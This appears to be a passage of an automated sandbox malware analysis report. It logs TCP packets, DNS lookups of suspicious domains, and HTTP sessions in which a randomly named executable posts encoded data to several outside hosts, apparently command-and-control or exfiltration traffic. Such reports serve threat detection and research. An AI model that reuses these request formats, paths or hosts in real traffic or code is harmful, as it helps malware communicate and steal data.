                                                          Nov 15, 2024 09:32:48.621846914 CET8049992170.39.213.43192.168.2.11
                                                          Nov 15, 2024 09:32:48.621953964 CET8049992170.39.213.43192.168.2.11
                                                          Nov 15, 2024 09:32:49.193069935 CET8049992170.39.213.43192.168.2.11
                                                          Nov 15, 2024 09:32:49.194561005 CET8049992170.39.213.43192.168.2.11
                                                          Nov 15, 2024 09:32:49.194624901 CET4999280192.168.2.11170.39.213.43
                                                          Nov 15, 2024 09:32:50.129295111 CET4999280192.168.2.11170.39.213.43
                                                          Nov 15, 2024 09:32:51.148152113 CET4999380192.168.2.11170.39.213.43
                                                          Nov 15, 2024 09:32:51.153187037 CET8049993170.39.213.43192.168.2.11
                                                          Nov 15, 2024 09:32:51.153291941 CET4999380192.168.2.11170.39.213.43
                                                          Nov 15, 2024 09:32:51.160948038 CET4999380192.168.2.11170.39.213.43
                                                          Nov 15, 2024 09:32:51.165875912 CET8049993170.39.213.43192.168.2.11
                                                          Nov 15, 2024 09:32:51.740057945 CET8049993170.39.213.43192.168.2.11
                                                          Nov 15, 2024 09:32:51.741229057 CET8049993170.39.213.43192.168.2.11
                                                          Nov 15, 2024 09:32:51.741328001 CET4999380192.168.2.11170.39.213.43
                                                          Nov 15, 2024 09:32:51.744060993 CET4999380192.168.2.11170.39.213.43
                                                          Nov 15, 2024 09:32:51.750072956 CET8049993170.39.213.43192.168.2.11
                                                          Nov 15, 2024 09:32:56.790878057 CET4999480192.168.2.1113.248.169.48
                                                          Nov 15, 2024 09:32:56.796107054 CET804999413.248.169.48192.168.2.11
                                                          Nov 15, 2024 09:32:56.796906948 CET4999480192.168.2.1113.248.169.48
                                                          Nov 15, 2024 09:32:56.809571981 CET4999480192.168.2.1113.248.169.48
                                                          Nov 15, 2024 09:32:56.814625978 CET804999413.248.169.48192.168.2.11
                                                          Nov 15, 2024 09:32:57.497752905 CET804999413.248.169.48192.168.2.11
                                                          Nov 15, 2024 09:32:57.497894049 CET4999480192.168.2.1113.248.169.48
                                                          Nov 15, 2024 09:32:58.316739082 CET4999480192.168.2.1113.248.169.48
                                                          Nov 15, 2024 09:32:58.321800947 CET804999413.248.169.48192.168.2.11
                                                          Nov 15, 2024 09:32:59.334943056 CET4999580192.168.2.1113.248.169.48
                                                          Nov 15, 2024 09:32:59.340248108 CET804999513.248.169.48192.168.2.11
                                                          Nov 15, 2024 09:32:59.340370893 CET4999580192.168.2.1113.248.169.48
                                                          Nov 15, 2024 09:32:59.355031013 CET4999580192.168.2.1113.248.169.48
                                                          Nov 15, 2024 09:32:59.360094070 CET804999513.248.169.48192.168.2.11
                                                          Nov 15, 2024 09:33:00.038557053 CET804999513.248.169.48192.168.2.11
                                                          Nov 15, 2024 09:33:00.038675070 CET4999580192.168.2.1113.248.169.48
                                                          Nov 15, 2024 09:33:00.864175081 CET4999580192.168.2.1113.248.169.48
                                                          Nov 15, 2024 09:33:00.869184017 CET804999513.248.169.48192.168.2.11
                                                          Nov 15, 2024 09:33:01.882421970 CET4999680192.168.2.1113.248.169.48
                                                          Nov 15, 2024 09:33:01.887464046 CET804999613.248.169.48192.168.2.11
                                                          Nov 15, 2024 09:33:01.887574911 CET4999680192.168.2.1113.248.169.48
                                                          Nov 15, 2024 09:33:01.899226904 CET4999680192.168.2.1113.248.169.48
                                                          Nov 15, 2024 09:33:01.904129982 CET804999613.248.169.48192.168.2.11
                                                          Nov 15, 2024 09:33:01.904165030 CET804999613.248.169.48192.168.2.11
                                                          Nov 15, 2024 09:33:02.553599119 CET804999613.248.169.48192.168.2.11
                                                          Nov 15, 2024 09:33:02.553798914 CET4999680192.168.2.1113.248.169.48
                                                          Nov 15, 2024 09:33:03.410342932 CET4999680192.168.2.1113.248.169.48
                                                          Nov 15, 2024 09:33:03.415365934 CET804999613.248.169.48192.168.2.11
                                                          Nov 15, 2024 09:33:04.428764105 CET4999780192.168.2.1113.248.169.48
                                                          Nov 15, 2024 09:33:04.433757067 CET804999713.248.169.48192.168.2.11
                                                          Nov 15, 2024 09:33:04.433866024 CET4999780192.168.2.1113.248.169.48
                                                          Nov 15, 2024 09:33:04.441015959 CET4999780192.168.2.1113.248.169.48
                                                          Nov 15, 2024 09:33:04.445899963 CET804999713.248.169.48192.168.2.11
                                                          Nov 15, 2024 09:33:05.122713089 CET804999713.248.169.48192.168.2.11
                                                          Nov 15, 2024 09:33:05.157073021 CET804999713.248.169.48192.168.2.11
                                                          Nov 15, 2024 09:33:05.157377005 CET4999780192.168.2.1113.248.169.48
                                                          Nov 15, 2024 09:33:05.160496950 CET4999780192.168.2.1113.248.169.48
                                                          Nov 15, 2024 09:33:05.165455103 CET804999713.248.169.48192.168.2.11
                                                          Nov 15, 2024 09:33:10.827517986 CET4999880192.168.2.1138.47.232.194
                                                          Nov 15, 2024 09:33:10.833499908 CET804999838.47.232.194192.168.2.11
                                                          Nov 15, 2024 09:33:10.833590031 CET4999880192.168.2.1138.47.232.194
                                                          Nov 15, 2024 09:33:10.845314980 CET4999880192.168.2.1138.47.232.194
                                                          Nov 15, 2024 09:33:10.851128101 CET804999838.47.232.194192.168.2.11
                                                          Nov 15, 2024 09:33:11.797110081 CET804999838.47.232.194192.168.2.11
                                                          Nov 15, 2024 09:33:11.847759962 CET4999880192.168.2.1138.47.232.194
                                                          Nov 15, 2024 09:33:11.978266001 CET804999838.47.232.194192.168.2.11
                                                          Nov 15, 2024 09:33:11.978457928 CET4999880192.168.2.1138.47.232.194
                                                          Nov 15, 2024 09:33:12.347891092 CET4999880192.168.2.1138.47.232.194
                                                          Nov 15, 2024 09:33:13.366658926 CET4999980192.168.2.1138.47.232.194
                                                          Nov 15, 2024 09:33:13.372004032 CET804999938.47.232.194192.168.2.11
                                                          Nov 15, 2024 09:33:13.372114897 CET4999980192.168.2.1138.47.232.194
                                                          Nov 15, 2024 09:33:13.382946968 CET4999980192.168.2.1138.47.232.194
                                                          Nov 15, 2024 09:33:13.387943029 CET804999938.47.232.194192.168.2.11
                                                          Nov 15, 2024 09:33:14.326690912 CET804999938.47.232.194192.168.2.11
                                                          Nov 15, 2024 09:33:14.379074097 CET4999980192.168.2.1138.47.232.194
                                                          Nov 15, 2024 09:33:14.508667946 CET804999938.47.232.194192.168.2.11
                                                          Nov 15, 2024 09:33:14.508796930 CET4999980192.168.2.1138.47.232.194
                                                          Nov 15, 2024 09:33:14.894913912 CET4999980192.168.2.1138.47.232.194
                                                          Nov 15, 2024 09:33:15.913394928 CET5000080192.168.2.1138.47.232.194
                                                          Nov 15, 2024 09:33:15.918414116 CET805000038.47.232.194192.168.2.11
                                                          Nov 15, 2024 09:33:15.918513060 CET5000080192.168.2.1138.47.232.194
                                                          Nov 15, 2024 09:33:15.930581093 CET5000080192.168.2.1138.47.232.194
                                                          Nov 15, 2024 09:33:15.935421944 CET805000038.47.232.194192.168.2.11
                                                          Nov 15, 2024 09:33:15.935575008 CET805000038.47.232.194192.168.2.11
                                                          Nov 15, 2024 09:33:16.886461020 CET805000038.47.232.194192.168.2.11
                                                          Nov 15, 2024 09:33:16.941579103 CET5000080192.168.2.1138.47.232.194
                                                          Nov 15, 2024 09:33:17.068716049 CET805000038.47.232.194192.168.2.11
                                                          Nov 15, 2024 09:33:17.068828106 CET5000080192.168.2.1138.47.232.194
                                                          Nov 15, 2024 09:33:17.441783905 CET5000080192.168.2.1138.47.232.194
                                                          Nov 15, 2024 09:33:18.461576939 CET5000180192.168.2.1138.47.232.194
                                                          Nov 15, 2024 09:33:18.466573954 CET805000138.47.232.194192.168.2.11
                                                          Nov 15, 2024 09:33:18.466703892 CET5000180192.168.2.1138.47.232.194
                                                          Nov 15, 2024 09:33:18.482115030 CET5000180192.168.2.1138.47.232.194
                                                          Nov 15, 2024 09:33:18.487010956 CET805000138.47.232.194192.168.2.11
                                                          Nov 15, 2024 09:33:19.413183928 CET805000138.47.232.194192.168.2.11
                                                          Nov 15, 2024 09:33:19.457186937 CET5000180192.168.2.1138.47.232.194
                                                          Nov 15, 2024 09:33:19.595577002 CET805000138.47.232.194192.168.2.11
                                                          Nov 15, 2024 09:33:19.595746040 CET5000180192.168.2.1138.47.232.194
                                                          Nov 15, 2024 09:33:19.596998930 CET5000180192.168.2.1138.47.232.194
                                                          Nov 15, 2024 09:33:19.602081060 CET805000138.47.232.194192.168.2.11
                                                          Nov 15, 2024 09:33:24.618588924 CET5000280192.168.2.11167.172.133.32
                                                          Nov 15, 2024 09:33:24.623598099 CET8050002167.172.133.32192.168.2.11
                                                          Nov 15, 2024 09:33:24.623680115 CET5000280192.168.2.11167.172.133.32
                                                          Nov 15, 2024 09:33:24.637320995 CET5000280192.168.2.11167.172.133.32
                                                          Nov 15, 2024 09:33:24.642321110 CET8050002167.172.133.32192.168.2.11
                                                          Nov 15, 2024 09:33:25.284940958 CET8050002167.172.133.32192.168.2.11
                                                          Nov 15, 2024 09:33:25.323867083 CET8050002167.172.133.32192.168.2.11
                                                          Nov 15, 2024 09:33:25.323982954 CET5000280192.168.2.11167.172.133.32
                                                          Nov 15, 2024 09:33:26.144980907 CET5000280192.168.2.11167.172.133.32
                                                          Nov 15, 2024 09:33:27.163810015 CET5000380192.168.2.11167.172.133.32
                                                          Nov 15, 2024 09:33:27.170869112 CET8050003167.172.133.32192.168.2.11
                                                          Nov 15, 2024 09:33:27.171087980 CET5000380192.168.2.11167.172.133.32
                                                          Nov 15, 2024 09:33:27.180752993 CET5000380192.168.2.11167.172.133.32
                                                          Nov 15, 2024 09:33:27.185682058 CET8050003167.172.133.32192.168.2.11
                                                          Nov 15, 2024 09:33:27.864753008 CET8050003167.172.133.32192.168.2.11
                                                          Nov 15, 2024 09:33:27.903640032 CET8050003167.172.133.32192.168.2.11
                                                          Nov 15, 2024 09:33:27.903700113 CET5000380192.168.2.11167.172.133.32
                                                          Nov 15, 2024 09:33:28.691580057 CET5000380192.168.2.11167.172.133.32
                                                          Nov 15, 2024 09:33:29.717299938 CET5000480192.168.2.11167.172.133.32
                                                          Nov 15, 2024 09:33:29.722407103 CET8050004167.172.133.32192.168.2.11
                                                          Nov 15, 2024 09:33:29.722522020 CET5000480192.168.2.11167.172.133.32
                                                          Nov 15, 2024 09:33:29.743107080 CET5000480192.168.2.11167.172.133.32
                                                          Nov 15, 2024 09:33:29.747992039 CET8050004167.172.133.32192.168.2.11
                                                          Nov 15, 2024 09:33:29.748136997 CET8050004167.172.133.32192.168.2.11
                                                          Nov 15, 2024 09:33:30.422269106 CET8050004167.172.133.32192.168.2.11
                                                          Nov 15, 2024 09:33:30.460450888 CET8050004167.172.133.32192.168.2.11
                                                          Nov 15, 2024 09:33:30.460915089 CET5000480192.168.2.11167.172.133.32
                                                          Nov 15, 2024 09:33:31.254127026 CET5000480192.168.2.11167.172.133.32
                                                          Nov 15, 2024 09:33:32.272636890 CET5000580192.168.2.11167.172.133.32
                                                          Nov 15, 2024 09:33:32.278243065 CET8050005167.172.133.32192.168.2.11
                                                          Nov 15, 2024 09:33:32.278328896 CET5000580192.168.2.11167.172.133.32
                                                          Nov 15, 2024 09:33:32.284755945 CET5000580192.168.2.11167.172.133.32
                                                          Nov 15, 2024 09:33:32.289740086 CET8050005167.172.133.32192.168.2.11
                                                          Nov 15, 2024 09:33:32.941217899 CET8050005167.172.133.32192.168.2.11
                                                          Nov 15, 2024 09:33:32.980036974 CET8050005167.172.133.32192.168.2.11
                                                          Nov 15, 2024 09:33:32.980412960 CET5000580192.168.2.11167.172.133.32
                                                          Nov 15, 2024 09:33:32.983222961 CET5000580192.168.2.11167.172.133.32
                                                          Nov 15, 2024 09:33:32.988334894 CET8050005167.172.133.32192.168.2.11
                                                          Nov 15, 2024 09:33:38.035048962 CET5000680192.168.2.11162.0.211.143
                                                          Nov 15, 2024 09:33:38.039952993 CET8050006162.0.211.143192.168.2.11
                                                          Nov 15, 2024 09:33:38.040142059 CET5000680192.168.2.11162.0.211.143
                                                          Nov 15, 2024 09:33:38.051337957 CET5000680192.168.2.11162.0.211.143
                                                          Nov 15, 2024 09:33:38.056505919 CET8050006162.0.211.143192.168.2.11
                                                          Nov 15, 2024 09:33:38.725321054 CET8050006162.0.211.143192.168.2.11
                                                          Nov 15, 2024 09:33:38.762579918 CET8050006162.0.211.143192.168.2.11
                                                          Nov 15, 2024 09:33:38.762774944 CET5000680192.168.2.11162.0.211.143
                                                          Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                          Nov 15, 2024 09:31:54.406953096 CET | 192.168.2.11 | 1.1.1.1 | 0xea95 | Standard query (0) | www.tangible.online | A (IP address) | IN (0x0001) | false
                                                          Nov 15, 2024 09:31:59.455307007 CET | 192.168.2.11 | 1.1.1.1 | 0x5243 | Standard query (0) | www.tesetturhanzade.xyz | A (IP address) | IN (0x0001) | false
                                                          Nov 15, 2024 09:32:15.789963961 CET | 192.168.2.11 | 1.1.1.1 | 0x3b28 | Standard query (0) | www.kantinestoel.online | A (IP address) | IN (0x0001) | false
                                                          Nov 15, 2024 09:32:29.418086052 CET | 192.168.2.11 | 1.1.1.1 | 0xfb6a | Standard query (0) | www.deeplungatlas.org | A (IP address) | IN (0x0001) | false
                                                          Nov 15, 2024 09:32:43.149343967 CET | 192.168.2.11 | 1.1.1.1 | 0xb11c | Standard query (0) | www.ultrawin23.shop | A (IP address) | IN (0x0001) | false
                                                          Nov 15, 2024 09:32:56.758553982 CET | 192.168.2.11 | 1.1.1.1 | 0x24ed | Standard query (0) | www.sonoscan.org | A (IP address) | IN (0x0001) | false
                                                          Nov 15, 2024 09:33:10.188607931 CET | 192.168.2.11 | 1.1.1.1 | 0xa5be | Standard query (0) | www.zz67x.top | A (IP address) | IN (0x0001) | false
                                                          Nov 15, 2024 09:33:24.601080894 CET | 192.168.2.11 | 1.1.1.1 | 0x6726 | Standard query (0) | www.omnibizlux.biz | A (IP address) | IN (0x0001) | false
                                                          Nov 15, 2024 09:33:37.992527962 CET | 192.168.2.11 | 1.1.1.1 | 0x5e53 | Standard query (0) | www.vibixx.site | A (IP address) | IN (0x0001) | false
                                                          Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                          Nov 15, 2024 09:31:54.430666924 CET | 1.1.1.1 | 192.168.2.11 | 0xea95 | Name error (3) | www.tangible.online | none | none | A (IP address) | IN (0x0001) | false
                                                          Nov 15, 2024 09:31:59.673063040 CET | 1.1.1.1 | 192.168.2.11 | 0x5243 | No error (0) | www.tesetturhanzade.xyz | redirect.natrocdn.com |  | CNAME (Canonical name) | IN (0x0001) | false
                                                          Nov 15, 2024 09:31:59.673063040 CET | 1.1.1.1 | 192.168.2.11 | 0x5243 | No error (0) | redirect.natrocdn.com | natroredirect.natrocdn.com |  | CNAME (Canonical name) | IN (0x0001) | false
                                                          Nov 15, 2024 09:31:59.673063040 CET | 1.1.1.1 | 192.168.2.11 | 0x5243 | No error (0) | natroredirect.natrocdn.com |  | 85.159.66.93 | A (IP address) | IN (0x0001) | false
                                                          Nov 15, 2024 09:32:15.824846029 CET | 1.1.1.1 | 192.168.2.11 | 0x3b28 | No error (0) | www.kantinestoel.online | kantinestoel.online |  | CNAME (Canonical name) | IN (0x0001) | false
                                                          Nov 15, 2024 09:32:15.824846029 CET | 1.1.1.1 | 192.168.2.11 | 0x3b28 | No error (0) | kantinestoel.online |  | 91.184.0.200 | A (IP address) | IN (0x0001) | false
                                                          Nov 15, 2024 09:32:29.481621027 CET | 1.1.1.1 | 192.168.2.11 | 0xfb6a | No error (0) | www.deeplungatlas.org |  | 194.9.94.86 | A (IP address) | IN (0x0001) | false
                                                          Nov 15, 2024 09:32:29.481621027 CET | 1.1.1.1 | 192.168.2.11 | 0xfb6a | No error (0) | www.deeplungatlas.org |  | 194.9.94.85 | A (IP address) | IN (0x0001) | false
                                                          Nov 15, 2024 09:32:43.508485079 CET | 1.1.1.1 | 192.168.2.11 | 0xb11c | No error (0) | www.ultrawin23.shop | ultrawin23.shop |  | CNAME (Canonical name) | IN (0x0001) | false
                                                          Nov 15, 2024 09:32:43.508485079 CET | 1.1.1.1 | 192.168.2.11 | 0xb11c | No error (0) | ultrawin23.shop |  | 170.39.213.43 | A (IP address) | IN (0x0001) | false
                                                          Nov 15, 2024 09:32:56.787311077 CET | 1.1.1.1 | 192.168.2.11 | 0x24ed | No error (0) | www.sonoscan.org |  | 13.248.169.48 | A (IP address) | IN (0x0001) | false
                                                          Nov 15, 2024 09:32:56.787311077 CET | 1.1.1.1 | 192.168.2.11 | 0x24ed | No error (0) | www.sonoscan.org |  | 76.223.54.146 | A (IP address) | IN (0x0001) | false
                                                          Nov 15, 2024 09:33:10.824460030 CET | 1.1.1.1 | 192.168.2.11 | 0xa5be | No error (0) | www.zz67x.top | zz67x.top |  | CNAME (Canonical name) | IN (0x0001) | false
                                                          Nov 15, 2024 09:33:10.824460030 CET | 1.1.1.1 | 192.168.2.11 | 0xa5be | No error (0) | zz67x.top |  | 38.47.232.194 | A (IP address) | IN (0x0001) | false
                                                          Nov 15, 2024 09:33:24.615907907 CET | 1.1.1.1 | 192.168.2.11 | 0x6726 | No error (0) | www.omnibizlux.biz |  | 167.172.133.32 | A (IP address) | IN (0x0001) | false
                                                          Nov 15, 2024 09:33:38.031513929 CET | 1.1.1.1 | 192.168.2.11 | 0x5e53 | No error (0) | www.vibixx.site |  | 162.0.211.143 | A (IP address) | IN (0x0001) | false
                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          0 | 192.168.2.11 | 49981 | 85.159.66.93 | 80 | 3732 | C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Nov 15, 2024 09:31:59.701544046 CET | 331 | OUT | GET /ur0f/?Ht=zogJdywBU1O1LleNfuKvTdvFae130slE6VGlZ0lHVZSYlVhh6xxrlMSZfTqXcXU1qXLRjwj9DFcRyKew14ZiOLfy4lE5d8KH961FjyGPsNNV+mrO2nqMYXA=&VRvXS=WfxxDba8X HTTP/1.1
                                                          Accept: */*
                                                          Accept-Language: en-US
                                                          Host: www.tesetturhanzade.xyz
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                          Nov 15, 2024 09:32:00.585974932 CET | 225 | IN | HTTP/1.1 404 Not Found
                                                          Server: nginx/1.14.1
                                                          Date: Fri, 15 Nov 2024 08:32:00 GMT
                                                          Content-Length: 0
                                                          Connection: close
                                                          X-Rate-Limit-Limit: 5s
                                                          X-Rate-Limit-Remaining: 19
                                                          X-Rate-Limit-Reset: 2024-11-15T08:32:05.4402834Z


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          1 | 192.168.2.11 | 49982 | 91.184.0.200 | 80 | 3732 | C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Nov 15, 2024 09:32:15.845979929 CET | 609 | OUT | POST /ggvc/ HTTP/1.1
                                                          Accept: */*
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.kantinestoel.online
                                                          Origin: http://www.kantinestoel.online
                                                          Cache-Control: no-cache
                                                          Connection: close
                                                          Content-Length: 199
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.kantinestoel.online/ggvc/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                          Data Ascii: Ht=xLMHm78liR0KrynixLm2rXUPKXc4TZGTpgieFF3MV/WV7NQqsijXhI78T9AmCeKh1CZ4VdXJ1XuwEVkun9Wvz56xQ8oLANVhEBDNwbTWGS0YRZvSeqTDVSyPSYoG9xNnbCKzWndZBFIHRbcCn+TvtTw+yGSxHerq174CYGE9Y7mzFb1IPzjA/ywHIVyAL2xgXw==
                                                          Nov 15, 2024 09:32:16.643704891 CET | 500 | IN | HTTP/1.1 404 Not Found
                                                          Date: Fri, 15 Nov 2024 08:32:16 GMT
                                                          Server: Apache
                                                          X-Xss-Protection: 1; mode=block
                                                          Referrer-Policy: no-referrer-when-downgrade
                                                          X-Content-Type-Options: nosniff
                                                          X-Frame-Options: SAMEORIGIN
                                                          Content-Length: 196
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          2 | 192.168.2.11 | 49983 | 91.184.0.200 | 80 | 3732 | C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Nov 15, 2024 09:32:18.382411957 CET | 629 | OUT | POST /ggvc/ HTTP/1.1
                                                          Accept: */*
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.kantinestoel.online
                                                          Origin: http://www.kantinestoel.online
                                                          Cache-Control: no-cache
                                                          Connection: close
                                                          Content-Length: 219
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.kantinestoel.online/ggvc/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                          Data Ascii: Ht=xLMHm78liR0KtS3i0oO2t3UAUHc4c5GfpgeeFEzcVMiV7vIqvnPXiI78YdAZdOLt1CVaVYXJ1USwEVUunMWsh56vZcoJddVhEBDNwbv8GS8YRpfSeIrEYyyQCIoGshNjbCLWWlo+BHAHRfMCnvTgkTww8mTOJ+6lxoNkalNVQrmOJ94SfQqX8h4FczTwCHUpM9pVG1QuwT4Fzoxe2u34Ea4=
                                                          Nov 15, 2024 09:32:19.221623898 CET | 500 | IN | HTTP/1.1 404 Not Found
                                                          Date: Fri, 15 Nov 2024 08:32:19 GMT
                                                          Server: Apache
                                                          X-Xss-Protection: 1; mode=block
                                                          Referrer-Policy: no-referrer-when-downgrade
                                                          X-Content-Type-Options: nosniff
                                                          X-Frame-Options: SAMEORIGIN
                                                          Content-Length: 196
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          3 | 192.168.2.11 | 49984 | 91.184.0.200 | 80 | 3732 | C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Nov 15, 2024 09:32:20.934016943 CET | 1642 | OUT | POST /ggvc/ HTTP/1.1
                                                          Accept: */*
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.kantinestoel.online
                                                          Origin: http://www.kantinestoel.online
                                                          Cache-Control: no-cache
                                                          Connection: close
                                                          Content-Length: 1231
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.kantinestoel.online/ggvc/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                          Nov 15, 2024 09:32:21.758438110 CET | 500 | IN | HTTP/1.1 404 Not Found
                                                          Date: Fri, 15 Nov 2024 08:32:21 GMT
                                                          Server: Apache
                                                          X-Xss-Protection: 1; mode=block
                                                          Referrer-Policy: no-referrer-when-downgrade
                                                          X-Content-Type-Options: nosniff
                                                          X-Frame-Options: SAMEORIGIN
                                                          Content-Length: 196
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          4 | 192.168.2.11 | 49985 | 91.184.0.200 | 80 | 3732 | C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Nov 15, 2024 09:32:23.478744984 CET | 331 | OUT | GET /ggvc/?VRvXS=WfxxDba8X&Ht=8JknlPcTs2UijknPxbO2oXM1DVs+MaDJyzfKPy/xZKvt3f8uoA3Cr57APZQOM8ic8BRlU5XE22T0HXZ7ivS1sK6ZXv4UHMlnEy7R+vzIZHc2JfvRSKbgShg= HTTP/1.1
                                                          Accept: */*
                                                          Accept-Language: en-US
                                                          Host: www.kantinestoel.online
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                          Nov 15, 2024 09:32:24.292563915 CET | 500 | IN | HTTP/1.1 404 Not Found
                                                          Date: Fri, 15 Nov 2024 08:32:24 GMT
                                                          Server: Apache
                                                          X-Xss-Protection: 1; mode=block
                                                          Referrer-Policy: no-referrer-when-downgrade
                                                          X-Content-Type-Options: nosniff
                                                          X-Frame-Options: SAMEORIGIN
                                                          Content-Length: 196
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          5 | 192.168.2.11 | 49986 | 194.9.94.86 | 80 | 3732 | C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Nov 15, 2024 09:32:29.504849911 CET | 603 | OUT | POST /57zf/ HTTP/1.1
                                                          Accept: */*
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.deeplungatlas.org
                                                          Origin: http://www.deeplungatlas.org
                                                          Cache-Control: no-cache
                                                          Connection: close
                                                          Content-Length: 199
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.deeplungatlas.org/57zf/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                          Data Ascii: Ht=cQ/jsRtgtxwgFcVkQMJUPWLr3ldZ5D1AYO6mtt7zZiTOWb571JgsM1TueIm8BK+AlDipjT1vXwdfXMFv7VKM1YaJZOvcLnsYfKpdCQ9FwJ3TwjWMGywSxGN8IYNFOgDEb6vw8l92mUhLPkrsfj9zrtuXJQ2jlCgbH1aPbxKKqors9gIbncPVIxTeKB4G4XvR9g==
                                                          Nov 15, 2024 09:32:30.335912943 CET | 1236 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Fri, 15 Nov 2024 08:32:30 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          X-Powered-By: PHP/8.1.29
                                                          Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                                                          Nov 15, 2024 09:32:30.335938931 CET | 1236 | IN
                                                          Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale =
                                                          Nov 15, 2024 09:32:30.335952044 CET | 1236 | IN
                                                          Data Ascii: tm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=whois">LoopiaWHOIS</a> to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="htt
                                                          Nov 15, 2024 09:32:30.336018085 CET | 1236 | IN
                                                          Data Ascii: t" placeholder="Find your desired domain"><button id="search-btn" class="btn btn-search" type="submit"></button></form></div><h3>Get full control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able
                                                          Nov 15, 2024 09:32:30.336031914 CET | 878 | IN
